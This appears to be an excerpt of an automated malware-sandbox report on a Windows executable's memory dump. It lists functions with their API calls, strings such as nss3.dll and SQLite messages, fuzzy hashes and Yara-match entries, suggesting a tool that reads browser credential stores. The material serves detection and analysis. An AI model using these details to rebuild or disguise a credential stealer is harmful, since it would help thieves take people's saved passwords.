                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                                                                  • Opcode ID: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                  • Instruction ID: b4e089481029338f932d4991b26cccaedb5970869045d73953a00dcfe725fe6b
                                                                                                                                                                  • Opcode Fuzzy Hash: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                  • Instruction Fuzzy Hash: 10914B75A00209DFCB24DF59C480A9EBBF1FF48304F15819AE809AB312D739E942CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406A86, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcslen$wcscatwcscpy
                                                                                                                                                                  • String ID: nss3.dll
                                                                                                                                                                  • API String ID: 1250441359-2492180550
                                                                                                                                                                  • Opcode ID: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                  • Instruction ID: 1e34d79d1f5922d0320f8d763ab64a9784b47cc615ba08cf08abcfcfe76fb249
                                                                                                                                                                  • Opcode Fuzzy Hash: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                  • Instruction Fuzzy Hash: D511ECF290121D96EB10EB60DD49BC673BC9B15314F1004BBE60DF21C1FB79DA548A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C181, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040C19C
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 0040C20E
                                                                                                                                                                    • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                  • Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                  • Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
                                                                                                                                                                  • Opcode Fuzzy Hash: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416DAA, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00416DB2
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00416DD2
                                                                                                                                                                  • malloc.MSVCRT ref: 00416DD8
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00416DF6
                                                                                                                                                                  • free.MSVCRT(?), ref: 00416DFF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4053608372-0
                                                                                                                                                                  • Opcode ID: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                  • Instruction ID: 7c4f126962bd8a7e2ff3a65b0fa2dbedc4b8b396d66bab6395f0ad674673df12
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                  • Instruction Fuzzy Hash: B501C8B550411DBF7F115FA5ECC1CFF7AACEA453E8721032AF414E2190D6348E405AB8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B60E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 0040B620
                                                                                                                                                                  • GetWindowRect.USER32 ref: 0040B62D
                                                                                                                                                                  • GetClientRect.USER32 ref: 0040B638
                                                                                                                                                                  • MapWindowPoints.USER32 ref: 0040B648
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                  • Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                  • Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
                                                                                                                                                                  • Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004442F9, Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                  • memset.MSVCRT ref: 00444333
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                    • Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
                                                                                                                                                                    • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
                                                                                                                                                                    • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
                                                                                                                                                                    • Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                  • Opcode ID: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
                                                                                                                                                                  • Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
                                                                                                                                                                  • Opcode Fuzzy Hash: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
                                                                                                                                                                  • Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C11B, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
                                                                                                                                                                  • Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
                                                                                                                                                                  • Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
                                                                                                                                                                  • Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D913, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040D937
                                                                                                                                                                  • memset.MSVCRT ref: 0040D94E
                                                                                                                                                                    • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
                                                                                                                                                                    • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040D97D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                  • Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
                                                                                                                                                                  • Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
                                                                                                                                                                  • Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
                                                                                                                                                                  • Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B720, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                  • Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
                                                                                                                                                                  • Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
                                                                                                                                                                  • Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004088A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameOpenwcscpy
                                                                                                                                                                  • String ID: X$xK@
                                                                                                                                                                  • API String ID: 3246554996-3735201224
                                                                                                                                                                  • Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
                                                                                                                                                                  • Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
                                                                                                                                                                    • Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF
                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                                                                                                                                  • SendDlgItemMessageW.USER32 ref: 0040107C
                                                                                                                                                                  • SendDlgItemMessageW.USER32 ref: 0040109A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                                                  • Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
                                                                                                                                                                  • Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
                                                                                                                                                                  • Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040840D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                  • String ID: edit
                                                                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                                                                  • Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
                                                                                                                                                                  • Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
                                                                                                                                                                  • Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
                                                                                                                                                                  • Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004144AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                  • API String ID: 2574300362-880857682
                                                                                                                                                                  • Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
                                                                                                                                                                  • Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
                                                                                                                                                                  • Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041D1AF, Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                  • Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                  • Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
                                                                                                                                                                  • Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410212, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                  • Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                  • Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
                                                                                                                                                                  • Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E5D7, Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004019F1: GetMenu.USER32 ref: 00401A0F
                                                                                                                                                                    • Part of subcall function 004019F1: GetSubMenu.USER32(00000000), ref: 00401A16
                                                                                                                                                                    • Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E
                                                                                                                                                                    • Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
                                                                                                                                                                    • Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73
                                                                                                                                                                  • GetMenu.USER32 ref: 0040E7C9
                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 0040E7D6
                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 0040E7D9
                                                                                                                                                                  • CheckMenuRadioItem.USER32 ref: 0040E7E5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889144086-0
                                                                                                                                                                  • Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                  • Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
                                                                                                                                                                  • Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                  • Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004178F0, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417A25
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417A3B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1661045500-0
                                                                                                                                                                  • Opcode ID: 8b809883c8012823d0c604d21937cfd29b6daf262b7c2114f35c7c6c66a95aef
                                                                                                                                                                  • Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b809883c8012823d0c604d21937cfd29b6daf262b7c2114f35c7c6c66a95aef
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042E431, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0
                                                                                                                                                                  • memcpy.MSVCRT ref: 0042E519
                                                                                                                                                                  Strings
                                                                                                                                                                  • sqlite_altertab_%s, xrefs: 0042E4EA
                                                                                                                                                                  • virtual tables may not be altered, xrefs: 0042E470
                                                                                                                                                                  • Cannot add a column to a view, xrefs: 0042E486
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                                                                  • Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                  • Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                  • Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430484, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: $, $CREATE TABLE
                                                                                                                                                                  • API String ID: 3510742995-3459038510
                                                                                                                                                                  • Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                  • Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404AC0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00404B07
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                    • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                    • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
